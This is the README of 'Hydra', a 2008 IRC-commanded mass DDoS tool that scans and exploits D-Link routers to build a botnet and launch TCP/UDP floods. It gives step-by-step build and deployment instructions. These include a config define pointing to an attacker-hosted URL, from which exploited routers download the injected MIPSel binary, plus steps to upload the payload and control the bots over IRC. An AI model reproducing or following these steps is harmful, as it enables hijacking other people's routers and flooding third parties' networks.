
   Hydra - Mass DDOS Tool (scanner/exploiter/attacker)
  Copyright (C) 2008 esaltato, <esaltato@autistici.org>

  DESCRIPTION:
  ------------
  Hydra is a mass-tool commanded by irc that allows scanners and 
  exploited dlink router for make BOTNET (rx-bot style), 
  in addition to this, with void you can attack with 
  tcp/udp flood.

  INSTALL:
  --------
  The installation is just a little complicated,
  but not hard!

  you need to download the source of hydra and
  the cross-compiler for mipsel, you find these
  all in hydra homepage.

  hydra-[VERSION].tar.gz / cross_gcc-mipsel.tar.bz2

  $ tar zxvf hydra* && sudo tar xjvf cross_gcc*
   [..]
  $ cd hydra-[VERSION]
  $ vi include/hydra_conf.h

     * NOW CONFIGURE IT!

     * WARNING IMPORTANT:
      --
      /* mipsel url reference */
      #define hydra_url    "http://your_fucking_url/youfucktard"
      /* mipsel precompiled binary tag */
      #define hydra_tag    "hydra_mipsel_bin_2008.1"
      --
      http://your_fucking_url/youfucktard/hydra_mipsel_bin_2008.1
      --

     * set the link of your compiled mipsel-binary
     * that's needed by hydra to inject in vulnerables routers.

  $ make x86 && make mipsel

     * now upload your mipsel-bin in your like ftp/http server
     * NOTE: check if your binary name is the same of hydra_tag
     *       in include/hydra_conf.h !

  $ ./hydra_x86_bin_2008.1
  $
    * now go to your irc server and manage your hydra!

  BUGS:
  -----
  if you find bugs (which is quite likely), please submit them to
  <esaltato@autistici.org> with specific information, such as your
  command-line, the nature of the bug and other.

  COPYRIGHT:
  ----------
  Hydra is Copyright (C) 2008 esaltato <esaltato@autistici.org>.
